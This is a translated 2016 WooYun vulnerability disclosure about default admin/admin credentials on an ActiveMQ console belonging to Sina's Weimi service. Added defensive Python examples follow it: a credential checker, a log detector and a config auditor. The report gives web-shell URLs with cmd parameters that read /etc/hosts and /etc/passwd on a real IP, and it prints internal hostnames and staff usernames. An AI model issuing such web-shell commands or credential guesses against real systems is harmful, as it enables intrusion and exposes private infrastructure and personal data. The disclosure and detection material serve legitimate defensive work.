Vulnerability summary

Defect ID: wooyun-2016-0224381

Title: Weak password on a Sina Weimi (新浪微米) system: getshell / root privileges / intranet environment

Vendor: Sina (新浪)

Author: 路人甲

Submitted: 2016-06-29 13:58

Fix time: 2016-07-04 10:30

Published: 2016-07-04 10:30

Type: Command execution

Severity: High

Self-assessed Rank: 12

Status: Vendor has been notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-06-29: Details sent to the vendor, awaiting vendor handling
2016-07-04: Vendor actively ignored the vulnerability; details disclosed to the public

Summary:

As in the title.

Details:

Seeing that everyone is submitting these to Sina, I'll follow the crowd and submit one too.



http://183.136.160.234:8161/
ActiveMQ web console with weak credentials: admin / admin
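Added example, not part of the original report: the check a tester or administrator would run for exactly this finding, a Python script that tries the console credentials ActiveMQ ships with over HTTP Basic auth. So that it runs offline, it starts a constructed stand-in console on localhost that still accepts admin/admin; the guesses beyond admin/admin and user/user, and the /admin/ probe path, are assumptions. Point check_console_creds at a real console only on systems you are authorised to test.

```python
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# admin/admin and user/user are the pairs ActiveMQ ships in conf/jetty-realm.properties;
# the remaining pairs are assumed extra guesses, extend or trim to taste.
DEFAULT_CREDS = [
    ("admin", "admin"),
    ("user", "user"),
    ("admin", "activemq"),
    ("admin", "password"),
]


def basic_header(user, password):
    """Build the HTTP Basic Authorization header value for a user/password pair."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def check_console_creds(base_url, creds=DEFAULT_CREDS, path="/admin/", timeout=5):
    """Try each pair against the console's protected path.

    Returns the first (user, password) that yields a 2xx/3xx reply, or None.
    A 401 means the realm rejected the pair; other HTTP errors are skipped so a
    403/404 on the probe path does not hide a credential that was accepted.
    """
    for user, password in creds:
        req = Request(
            base_url.rstrip("/") + path,
            headers={"Authorization": basic_header(user, password)},
        )
        try:
            with urlopen(req, timeout=timeout) as resp:
                if 200 <= resp.status < 400:
                    return (user, password)
        except HTTPError as err:
            if err.code == 401:
                continue
        except URLError:
            return None  # host unreachable, stop probing
    return None


class MockConsole(BaseHTTPRequestHandler):
    """Constructed stand-in for a console still on its shipped realm (not the real target)."""

    REALM_USERS = {"admin": "admin"}

    def do_GET(self):
        auth = self.headers.get("Authorization", "")
        accepted = False
        if auth.startswith("Basic "):
            try:
                user, _, password = base64.b64decode(auth[6:]).decode().partition(":")
                accepted = self.REALM_USERS.get(user) == password
            except (ValueError, UnicodeDecodeError):
                accepted = False
        if accepted:
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(b"<html><title>ActiveMQ Console</title></html>")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'basic realm="ActiveMQRealm"')
            self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo quiet


def run_demo():
    """Start the mock console on an ephemeral port, probe it, and return the accepted pair."""
    server = HTTPServer(("127.0.0.1", 0), MockConsole)
    worker = threading.Thread(target=server.serve_forever, daemon=True)
    worker.start()
    try:
        return check_console_creds(f"http://127.0.0.1:{server.server_address[1]}")
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("accepted credentials:", run_demo())
```

Against a live host the call is check_console_creds("http://host:8161"); a None result means none of the listed pairs was accepted, not that the console is safe.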



http://183.136.160.234:8161/admin/test/sex.jsp
http://183.136.160.234:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/hosts
This should lead straight into the intranet.

# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
202.106.184.152 interface.blog.sina.com.cn
10.0.8.32 datacube_mongo
#shequ
10.221.149.246 shequ.dev.weimi.me
#hdfs
#10.0.8.123 wemeetcluster
10.0.8.103 storage.intra.ilianmeng.com
10.0.8.103 test2.live.intra.ilianmeng.com
10.0.8.32 matrix_registry_1
10.0.8.32 matrix_registry_2
10.0.8.32 matrix_registry_3 mongodb_server
10.0.8.32 matrixmc_1 matrixuuid_1
10.0.8.32 matrixmc_2 matrixuuid_2
10.0.8.32 matrixmc_3 matrixuuid_3
10.0.8.32 matrixmc_4 matrixuuid_4
10.0.8.32 matrixdb m_api_db.intra.ilianmeng.com
10.0.8.32 s_api_db.intra.ilianmeng.com
10.0.8.32 matrixredis_1
10.0.8.32 matrixredis_2
10.0.8.32 matrixredis_3
10.0.8.32 matrixredis_4
10.0.8.103 sentinel_host_1
10.0.8.103 sentinel_host_2
10.0.8.32 sentinel_host_3
10.0.8.32 pushserver push.intra.ilianmeng.com
10.0.8.10 node10.intra.hiwemeet.com
10.0.8.32 node11.intra.hiwemeet.com
10.0.8.103 node103.intra.ilianmeng.com img.intra.ilianmeng.com amq.intra.ilianmeng.com searchService neo4j_server search.intra.ilianmeng.com test2.api.intra.ilianmeng.com test2.img.ilianmeng.com test2.img.intra.ilianmeng.com
10.0.8.13 node13.intra.hiwemeet.com
10.0.8.14 node14.intra.hiwemeet.com
10.0.8.2 node2.intra.hiwemeet.com
10.0.8.3 node3.intra.hiwemeet.com
10.0.8.4 node4.intra.hiwemeet.com
10.0.8.5 node5.intra.hiwemeet.com
10.0.8.6 node6.intra.hiwemeet.com
10.0.8.7 node7.intra.hiwemeet.com
10.0.8.8 node8.intra.hiwemeet.com
10.0.8.9 node9.intra.hiwemeet.com
10.0.8.15 salt yum.intra.hiwemeet.com node15.intra.hiwemeet.com statsdserver repo.hiwemeet.com
10.0.8.43 node43.intra.hiwemeet.com baokumc_1 baokumc_2 baokumc_3 baokumc_4 s_api_db.intra.baoku.com m_api_db.intra.baoku.com
10.0.8.44 node44.intra.hiwemeet.com
10.0.8.45 node45.intra.hiwemeet.com
10.0.8.102 node102.intra.hiwemeet.com sub.intra.hiwemeet.com
10.0.8.103 node103.intra.hiwemeet.com sub.intra.ilianmeng.com
10.0.8.102 couchbase115 couchbase116
10.0.8.103 couchbase117 couchbase118
10.0.8.6 redis1.shihui.com
10.0.8.32 s_shihui_db.intra.ilianmeng.com s_shihui_db.intra.hiwemeet.com
10.0.8.32 m_shihui_db.intra.ilianmeng.com m_shihui_db.intra.hiwemeet.com
10.0.8.235 redis2.shihui.com
10.0.8.235 redis3.shihui.com
10.0.8.235 shihuiredis_1
10.0.8.235 shihuiredis_2
10.0.8.235 shihuiredis_3
10.0.8.235 shihuiredis_4
10.0.8.32 shihuimc_1
10.0.8.32 shihuimc_2
10.0.8.32 shihuimc_3
10.0.8.32 shihuimc_4
10.0.8.103 test2.img.intra.ilianmeng.com
10.0.8.103 test2.scorpio.ilianmeng.com
10.0.8.107 static.17shihui.cn
10.0.8.103 api.ilianmeng.com
10.0.8.103 dev.scorpio.ilianmeng.com
10.0.8.32 test2.search.user.db.host search.user.db.host
10.0.8.43 51baokuredis_1
10.0.8.43 51baokuredis_2
10.0.8.43 51baoku_uuid_1
10.0.8.43 51baoku_uuid_2
10.0.8.43 m_db.intra.51baoku.com
10.0.8.43 s_db.intra.51baoku.com


http://183.136.160.234:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
hacluster:x:499:499:cluster user:/home/hacluster:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
cimsrvr:x:134:134:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:498:495:RealtimeKit:/proc:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:497:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
ricci:x:140:140:ricci daemon user:/var/lib/ricci:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dhcpd:x:177:177:DHCP server:/:/sbin/nologin
memcached:x:496:493:Memcached daemon:/var/run/memcached:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pulse:x:495:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
stap-server:x:155:155:Systemtap Compile Server:/var/lib/stap-server:/sbin/nologin
xguest:x:500:500:Guest:/home/xguest:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin
luci:x:141:141:luci high availability management application:/var/lib/luci:/sbin/nologin
ident:x:98:98::/:/sbin/nologin
uuidd:x:494:488:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin
yuanming:x:501:501::/home/yuanming:/bin/bash
haibo:x:502:502::/home/haibo:/bin/bash
gaozhi:x:503:503::/home/gaozhi:/bin/bash
hanjian:x:504:504::/home/hanjian:/bin/bash
liuxin:x:505:505::/home/liuxin:/bin/bash
yiqian:x:506:506::/home/yiqian:/bin/bash
yifeng:x:507:507::/home/yifeng:/bin/bash
www:x:508:508::/home/www:/bin/bash
couchbase:x:493:486:couchbase system user:/opt/couchbase:/bin/sh
nginx:x:492:485:Nginx web server:/var/lib/nginx:/sbin/nologin
td-agent:x:491:484:td-agent:/var/lib/td-agent:/sbin/nologin
yongrong:x:509:509::/home/yongrong:/bin/bash
baoku:x:510:10::/home/baoku:/bin/bash
yuwenlong:x:511:511::/home/yuwenlong:/bin/bash
jizheng:x:512:10::/home/jizheng:/bin/bash
zhangjianghao:x:513:513::/home/zhangjianghao:/bin/bash


That is all the proof I will give.
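Added example, not from the report: detection logic for the request pattern shown above, run over constructed Jetty/NCSA-style request log lines (the client addresses, timestamps and byte counts are made up; the allow-list of stock console JSPs and the parameter names are assumptions). It flags .jsp files under /admin/ that the stock console does not serve, and query parameters that carry shell commands, which is what the pwd=...&cmd=... requests look like once they reach a log.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed NCSA-style request log lines modelled on the request path in the report;
# the client addresses, timestamps and byte counts are made up.
SAMPLE_LOG = """\
10.0.8.15 - - [29/Jun/2016:13:40:02 +0800] "GET /admin/queues.jsp HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.0.8.15 - admin [29/Jun/2016:13:41:10 +0800] "GET /admin/browse.jsp?JMSDestination=orders HTTP/1.1" 200 4402 "-" "Mozilla/5.0"
203.0.113.7 - admin [29/Jun/2016:13:55:31 +0800] "GET /admin/test/sex.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - admin [29/Jun/2016:13:56:02 +0800] "GET /admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/hosts HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
203.0.113.7 - admin [29/Jun/2016:13:57:45 +0800] "GET /admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/passwd HTTP/1.1" 200 2990 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# JSPs the stock admin console serves. Assumed and partial: build the real list from
# your own install (webapps/admin/) and treat anything not on it as suspect.
KNOWN_CONSOLE_JSPS = {
    "index.jsp", "queues.jsp", "topics.jsp", "subscribers.jsp", "connections.jsp",
    "connection.jsp", "network.jsp", "scheduled.jsp", "send.jsp", "browse.jsp",
    "message.jsp", "queueGraph.jsp", "queueConsumers.jsp", "queueProducers.jsp",
}

# Parameter names typical of one-line JSP shells, and values that look like shell input.
CMD_PARAMS = {"cmd", "command", "exec", "execute"}
SHELL_HINTS = re.compile(r"(/etc/|/bin/|/tmp/|[;|`$]|\b(cat|id|whoami|uname|wget|curl|bash|sh)\b)")


def analyse_line(line):
    """Return a finding dict for one log line, or None if nothing looks wrong."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = parts.path
    reasons = []
    if path.startswith("/admin/") and path.lower().endswith(".jsp"):
        if path.rsplit("/", 1)[-1] not in KNOWN_CONSOLE_JSPS:
            reasons.append(f"unknown JSP under /admin/: {path}")
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:  # parse_qs already URL-decodes, so %20 is a space here
            if key.lower() in CMD_PARAMS:
                reasons.append(f"command-like parameter {key}={value!r}")
            elif SHELL_HINTS.search(value):
                reasons.append(f"shell-looking value in {key}={value!r}")
    if not reasons:
        return None
    return {
        "src": m.group("src"),
        "user": m.group("user"),
        "time": m.group("ts"),
        "path": path,
        "status": int(m.group("status")),
        "reasons": reasons,
    }


def detect(log_text):
    """Run analyse_line over every line and collect the findings in log order."""
    return [f for f in (analyse_line(line) for line in log_text.splitlines()) if f]


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit["time"], hit["src"], hit["user"], hit["path"], "->", "; ".join(hit["reasons"]))
```

The first unknown-JSP hit (a bare GET with no parameters) is the one worth alerting on early: a shell is usually fetched once to confirm it works before any command is sent.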

Proof of vulnerability:

(Same /etc/passwd output as shown under Details above.)

Remediation:

Weak password: replace the default admin / admin credentials on the ActiveMQ web console.
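Added example, not from the report and not ActiveMQ's own code: a Python audit of the two settings behind this finding, the shipped admin/admin and user/user entries in conf/jetty-realm.properties and the web console's host binding in conf/jetty.xml. The file contents below are constructed samples laid out like the shipped files; the hardened realm password is a placeholder and the 16-character minimum is an assumed local policy.

```python
import xml.etree.ElementTree as ET

# Pairs ActiveMQ ships enabled in conf/jetty-realm.properties.
SHIPPED_DEFAULTS = {("admin", "admin"), ("user", "user")}
MIN_PASSWORD_LEN = 16  # assumed local policy, not an ActiveMQ setting
HASHED_PREFIXES = ("OBF:", "MD5:", "CRYPT:")  # Jetty's non-cleartext password forms

# Constructed samples that follow the layout of the shipped files (not copied from the target).
REALM_AS_SHIPPED = """\
# Defines users that can access the web (console, demo, etc.)
# username: password [,rolename ...]
admin: admin, admin
user: user, user
"""

REALM_HARDENED = """\
# username: password [,rolename ...]
admin: Replace-With-A-Long-Random-Secret-1234, admin
"""

JETTY_XML_AS_SHIPPED = """\
<beans xmlns="http://www.springframework.org/schema/beans">
  <bean id="jettyPort" class="org.apache.activemq.web.WebConsolePort" init-method="start">
    <property name="host" value="0.0.0.0"/>
    <property name="port" value="8161"/>
  </bean>
  <bean id="securityConstraint" class="org.eclipse.jetty.util.security.Constraint">
    <property name="name" value="BASIC"/>
    <property name="roles" value="user,admin"/>
    <property name="authenticate" value="true"/>
  </bean>
</beans>
"""

JETTY_XML_HARDENED = JETTY_XML_AS_SHIPPED.replace('value="0.0.0.0"', 'value="127.0.0.1"')


def parse_realm(text):
    """Parse Jetty's 'username: password [,role ...]' properties format."""
    users = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, sep, rest = line.partition(":")
        if not sep:
            continue
        fields = [f.strip() for f in rest.split(",")]
        users[name.strip()] = (fields[0], fields[1:])
    return users


def audit_realm(text):
    """Report accounts whose password is a shipped default, equals the name, or is short cleartext."""
    findings = []
    for name, (password, _roles) in parse_realm(text).items():
        if (name, password) in SHIPPED_DEFAULTS:
            findings.append(f"{name}: shipped default password still enabled")
        elif password == name:
            findings.append(f"{name}: password equals username")
        elif not password.startswith(HASHED_PREFIXES) and len(password) < MIN_PASSWORD_LEN:
            findings.append(f"{name}: cleartext password shorter than {MIN_PASSWORD_LEN}")
    return findings


def audit_jetty_xml(text):
    """Flag a console bound to every interface, or a constraint with authentication off."""
    findings = []
    for bean in ET.fromstring(text).iter():
        if not bean.tag.endswith("}bean") and bean.tag != "bean":
            continue
        bean_id = bean.get("id", "")
        props = {p.get("name"): p.get("value") for p in bean if p.tag.endswith("property")}
        if bean_id == "jettyPort" and props.get("host") in ("0.0.0.0", "::"):
            findings.append(
                f"web console bound to {props['host']}:{props.get('port')}; "
                "bind it to 127.0.0.1 or a management address"
            )
        if bean.get("class", "").endswith(".Constraint") and props.get("authenticate", "true").lower() == "false":
            findings.append(f"{bean_id}: authenticate=false")
    return findings


if __name__ == "__main__":
    for label, text in (("realm as shipped", REALM_AS_SHIPPED), ("realm hardened", REALM_HARDENED)):
        print(label, audit_realm(text) or "ok")
    for label, text in (("jetty.xml as shipped", JETTY_XML_AS_SHIPPED), ("jetty.xml hardened", JETTY_XML_HARDENED)):
        print(label, audit_jetty_xml(text) or "ok")
```

Changing the password alone still leaves the console reachable from the internet, as it was here; the host binding is the second half of the fix.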

Copyright notice: when reposting, credit the source: 路人甲@乌云


Vendor response

Vendor reply:

Severity: No impact, vendor ignored

Ignored at: 2016-07-04 10:30

Vendor comment:

Please submit this directly to Weimi (微米) and contact them for a fix.

Latest status:

None yet


Comments:

  1. 2016-06-30 15:16 | 洋葱 (WooYun vendor)

    Weak password... 洋葱 grabbing a spot

  2. 2016-06-30 15:27 | j14n (regular white hat | Rank: 2345 | vulnerabilities: 421)

    @洋葱 I'll eat you